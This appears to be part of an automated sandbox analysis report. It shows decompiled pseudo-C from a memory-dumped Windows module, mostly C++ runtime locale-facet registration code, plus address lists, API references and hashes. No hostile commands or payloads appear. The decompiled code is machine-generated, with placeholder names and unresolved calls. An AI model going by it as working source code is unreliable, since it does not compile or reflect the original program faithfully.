																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t810);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6e286dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t809);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6e286dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t808);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6e286dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6E1C6FD3(__eflags, _t807);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6e286df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6E1C6FD3(__eflags, _t806);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6e286df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6E1C6FD3(__eflags, _t805);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6e286dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6E1C6FD3(__eflags, _t804);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6e286df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6E1C6FD3(__eflags, _t803);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6e286dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6E1C6FD3(__eflags, _t802);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6e286dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6E1C6FD3(__eflags, _t801);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6e286db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6E1C6FD3(__eflags, _t800);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6e286de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6E1C6FD3(__eflags, _t799);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6e286dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

0x6e1cf0dd
0x6e1cf0dd
0x6e1cf0e4
0x6e1cf0ee
0x6e1cf0f3
0x6e1cf0fe
0x6e1cf102
0x6e1cf105
0x6e1cf10a
0x6e1cf10e
0x6e1cf113
0x6e1cf117
0x6e1cf15c
0x6e1cf15f
0x6e1cf16b
0x6e1cf119
0x6e1cf11b
0x6e1cf121
0x6e1cf127
0x6e1cf12f
0x6e1cf132
0x6e1cf16f
0x6e1cf17d
0x6e1cf182
0x6e1cf18a
0x6e1cf194
0x6e1cf199
0x6e1cf1a4
0x6e1cf1a8
0x6e1cf1ab
0x6e1cf1b0
0x6e1cf1b9
0x6e1cf1bb
0x6e1cf1bd
0x6e1cf202
0x6e1cf205
0x6e1cf211
0x6e1cf1bf
0x6e1cf1bf
0x6e1cf1c1
0x6e1cf1c7
0x6e1cf1cd
0x6e1cf1d5
0x6e1cf1d8
0x6e1cf215
0x6e1cf223
0x6e1cf228
0x6e1cf230
0x6e1cf23a
0x6e1cf23f
0x6e1cf24a
0x6e1cf24e
0x6e1cf251
0x6e1cf256
0x6e1cf25f
0x6e1cf261
0x6e1cf263
0x6e1cf2a8
0x6e1cf2ab
0x6e1cf2b7
0x6e1cf265
0x6e1cf265
0x6e1cf267
0x6e1cf26d
0x6e1cf273
0x6e1cf27b
0x6e1cf27e
0x6e1cf2bb
0x6e1cf2c9
0x6e1cf2ce
0x6e1cf2d6
0x6e1cf2e0
0x6e1cf2e5
0x6e1cf2f0
0x6e1cf2f4
0x6e1cf2f7
0x6e1cf2fc
0x6e1cf305
0x6e1cf307
0x6e1cf309
0x6e1cf34e
0x6e1cf351
0x6e1cf35d
0x6e1cf30b
0x6e1cf30b
0x6e1cf30d
0x6e1cf313
0x6e1cf319
0x6e1cf321
0x6e1cf324
0x6e1cf361
0x6e1cf36f
0x6e1cf374
0x6e1cf37c
0x6e1cf386
0x6e1cf38b
0x6e1cf396
0x6e1cf39a
0x6e1cf39d
0x6e1cf3a2
0x6e1cf3ab
0x6e1cf3ad
0x6e1cf3af
0x6e1cf3f4
0x6e1cf3f7
0x6e1cf403
0x6e1cf3b1
0x6e1cf3b1
0x6e1cf3b3
0x6e1cf3b9
0x6e1cf3bf
0x6e1cf3c7
0x6e1cf3ca
0x6e1cf407
0x6e1cf415
0x6e1cf41a
0x6e1cf422
0x6e1cf42c
0x6e1cf431
0x6e1cf43c
0x6e1cf440
0x6e1cf443
0x6e1cf448
0x6e1cf451
0x6e1cf453
0x6e1cf455
0x6e1cf49a
0x6e1cf49d
0x6e1cf4a9
0x6e1cf457
0x6e1cf457
0x6e1cf459
0x6e1cf45f
0x6e1cf465
0x6e1cf46d
0x6e1cf470
0x6e1cf4ad
0x6e1cf4bb
0x6e1cf4c0
0x6e1cf4c8
0x6e1cf4d2
0x6e1cf4d7
0x6e1cf4e2
0x6e1cf4e6
0x6e1cf4e9
0x6e1cf4ee
0x6e1cf4f7
0x6e1cf4f9
0x6e1cf4fb
0x6e1cf540
0x6e1cf543
0x6e1cf54f
0x6e1cf4fd
0x6e1cf4fd
0x6e1cf4ff
0x6e1cf505
0x6e1cf50b
0x6e1cf513
0x6e1cf516
0x6e1cf553
0x6e1cf561
0x6e1cf566
0x6e1cf56e
0x6e1cf578
0x6e1cf57d
0x6e1cf588
0x6e1cf58c
0x6e1cf58f
0x6e1cf594
0x6e1cf59d
0x6e1cf59f
0x6e1cf5a1
0x6e1cf5e6
0x6e1cf5e9
0x6e1cf5f5
0x6e1cf5a3
0x6e1cf5a3
0x6e1cf5a5
0x6e1cf5ab
0x6e1cf5b1
0x6e1cf5b9
0x6e1cf5bc
0x6e1cf5f9
0x6e1cf607
0x6e1cf60c
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459
0x6e1cf3cc
0x6e1cf3cc
0x6e1cf3cf
0x6e1cf3d3
0x6e1cf3d7
0x6e1cf3e4
0x6e1cf3ec
0x6e1cf3ee
0x00000000
0x6e1cf3ee
0x6e1cf3b5
0x6e1cf3b5
0x00000000
0x6e1cf3b5
0x6e1cf3b3
0x6e1cf326
0x6e1cf326
0x6e1cf329
0x6e1cf32d
0x6e1cf331
0x6e1cf33e
0x6e1cf346
0x6e1cf348
0x00000000
0x6e1cf348
0x6e1cf30f
0x6e1cf30f
0x00000000
0x6e1cf30f
0x6e1cf30d
0x6e1cf280
0x6e1cf280
0x6e1cf283
0x6e1cf287
0x6e1cf28b
0x6e1cf298
0x6e1cf2a0
0x6e1cf2a2
0x00000000
0x6e1cf2a2
0x6e1cf269
0x6e1cf269
0x00000000
0x6e1cf269
0x6e1cf267
0x6e1cf1da
0x6e1cf1da
0x6e1cf1dd
0x6e1cf1e1
0x6e1cf1e5
0x6e1cf1f2
0x6e1cf1fa
0x6e1cf1fc
0x00000000
0x6e1cf1fc
0x6e1cf1c3
0x6e1cf1c3
0x00000000
0x6e1cf1c3
0x6e1cf1c1
0x6e1cf134
0x6e1cf134
0x6e1cf137
0x6e1cf13b
0x6e1cf13f
0x6e1cf14c
0x6e1cf154
0x6e1cf156
0x00000000
0x6e1cf156
0x6e1cf11d
0x6e1cf11d
0x00000000
0x6e1cf11d
0x6e1cf11b

APIs

__EH_prolog3.LIBCMT ref: 6E1CF0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF0EE
int.LIBCPMT ref: 6E1CF105

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

ctype.LIBCPMT ref: 6E1CF128
std::_Facet_Register.LIBCPMT ref: 6E1CF13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF17D

Strings

(k(n, xrefs: 6E1CF0F9

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (k(n
API String ID: 1394824916-4145520377
Opcode ID: ede4d65d80b5cf43701d66f93d606e54925046580e77aea59690f975ef6a2e93
Instruction ID: 1e8ca8cb7d423c84789e45c6f57448fc64c167cd44a29ab081d33df0703bb644
Opcode Fuzzy Hash: ede4d65d80b5cf43701d66f93d606e54925046580e77aea59690f975ef6a2e93
Instruction Fuzzy Hash: 75113A759105288BCF01EBE4C854AFEB7BAAF65B14F240409D524E7290DF78D984E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CA0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t178 =  *0x6e286cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1A161C(0x6e286b38);
				_t133 = _a8;
				_t64 = E6E1A171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CA9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t173, _t178, 0x14);
							E6E1C6653( &_v20, 0);
							_t179 =  *0x6e286ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1A161C(0x6e286cb8);
							_t140 = _a8;
							_t174 = E6E1A171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t130, _t174, _t179, 0x14);
										E6E1C6653( &_v20, 0);
										_t180 =  *0x6e286cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1A161C(0x6e286cbc);
										_t147 = _a8;
										_t175 = E6E1A171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438( &_v32);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t130, _t175, _t180, 0x14);
													E6E1C6653( &_v20, 0);
													_t181 =  *0x6e286cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1A161C(0x6e286cc0);
													_t154 = _a8;
													_t176 = E6E1A171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E1C66BA( &_v20);
														return E6E1E0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E1CAB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1A1438(_t158);
																E6E1E3D74( &_v32, 0x6e283504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e22ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E1C6FD3(__eflags, _t176);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e286cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t175);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e286cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t174);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e286ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t173);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e286cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

0x6e1ca0ff
0x6e1ca0ff
0x6e1ca106
0x6e1ca110
0x6e1ca115
0x6e1ca120
0x6e1ca124
0x6e1ca127
0x6e1ca12c
0x6e1ca130
0x6e1ca135
0x6e1ca139
0x6e1ca17e
0x6e1ca181
0x6e1ca18d
0x6e1ca13b
0x6e1ca13d
0x6e1ca143
0x6e1ca149
0x6e1ca151
0x6e1ca154
0x6e1ca191
0x6e1ca19f
0x6e1ca1a4
0x6e1ca1ac
0x6e1ca1b6
0x6e1ca1bb
0x6e1ca1c6
0x6e1ca1ca
0x6e1ca1cd
0x6e1ca1d2
0x6e1ca1db
0x6e1ca1dd
0x6e1ca1df
0x6e1ca224
0x6e1ca227
0x6e1ca233
0x6e1ca1e1
0x6e1ca1e1
0x6e1ca1e3
0x6e1ca1e9
0x6e1ca1ef
0x6e1ca1f7
0x6e1ca1fa
0x6e1ca237
0x6e1ca245
0x6e1ca24a
0x6e1ca252
0x6e1ca25c
0x6e1ca261
0x6e1ca26c
0x6e1ca270
0x6e1ca273
0x6e1ca278
0x6e1ca281
0x6e1ca283
0x6e1ca285
0x6e1ca2ca
0x6e1ca2cd
0x6e1ca2d9
0x6e1ca287
0x6e1ca287
0x6e1ca289
0x6e1ca28f
0x6e1ca295
0x6e1ca29d
0x6e1ca2a0
0x6e1ca2dd
0x6e1ca2eb
0x6e1ca2f0
0x6e1ca2f8
0x6e1ca302
0x6e1ca307
0x6e1ca312
0x6e1ca316
0x6e1ca319
0x6e1ca31e
0x6e1ca327
0x6e1ca329
0x6e1ca32b
0x6e1ca370
0x6e1ca373
0x6e1ca37f
0x6e1ca32d
0x6e1ca32d
0x6e1ca32f
0x6e1ca335
0x6e1ca33b
0x6e1ca343
0x6e1ca346
0x6e1ca380
0x6e1ca383
0x6e1ca391
0x6e1ca396
0x6e1ca39a
0x6e1ca39e
0x6e1ca3a3
0x6e1ca3a6
0x6e1ca3ad
0x6e1ca348
0x6e1ca348
0x6e1ca34b
0x6e1ca34f
0x6e1ca353
0x6e1ca360
0x6e1ca368
0x6e1ca36a
0x00000000
0x6e1ca36a
0x6e1ca331
0x6e1ca331
0x00000000
0x6e1ca331
0x6e1ca32f
0x6e1ca2a2
0x6e1ca2a2
0x6e1ca2a5
0x6e1ca2a9
0x6e1ca2ad
0x6e1ca2ba
0x6e1ca2c2
0x6e1ca2c4
0x00000000
0x6e1ca2c4
0x6e1ca28b
0x6e1ca28b
0x00000000
0x6e1ca28b
0x6e1ca289
0x6e1ca1fc
0x6e1ca1fc
0x6e1ca1ff
0x6e1ca203
0x6e1ca207
0x6e1ca214
0x6e1ca21c
0x6e1ca21e
0x00000000
0x6e1ca21e
0x6e1ca1e5
0x6e1ca1e5
0x00000000
0x6e1ca1e5
0x6e1ca1e3
0x6e1ca156
0x6e1ca156
0x6e1ca159
0x6e1ca15d
0x6e1ca161
0x6e1ca16e
0x6e1ca176
0x6e1ca178
0x00000000
0x6e1ca178
0x6e1ca13f
0x6e1ca13f
0x00000000
0x6e1ca13f
0x6e1ca13d

APIs

__EH_prolog3.LIBCMT ref: 6E1CA106
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA110
int.LIBCPMT ref: 6E1CA127

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

ctype.LIBCPMT ref: 6E1CA14A
std::_Facet_Register.LIBCPMT ref: 6E1CA161
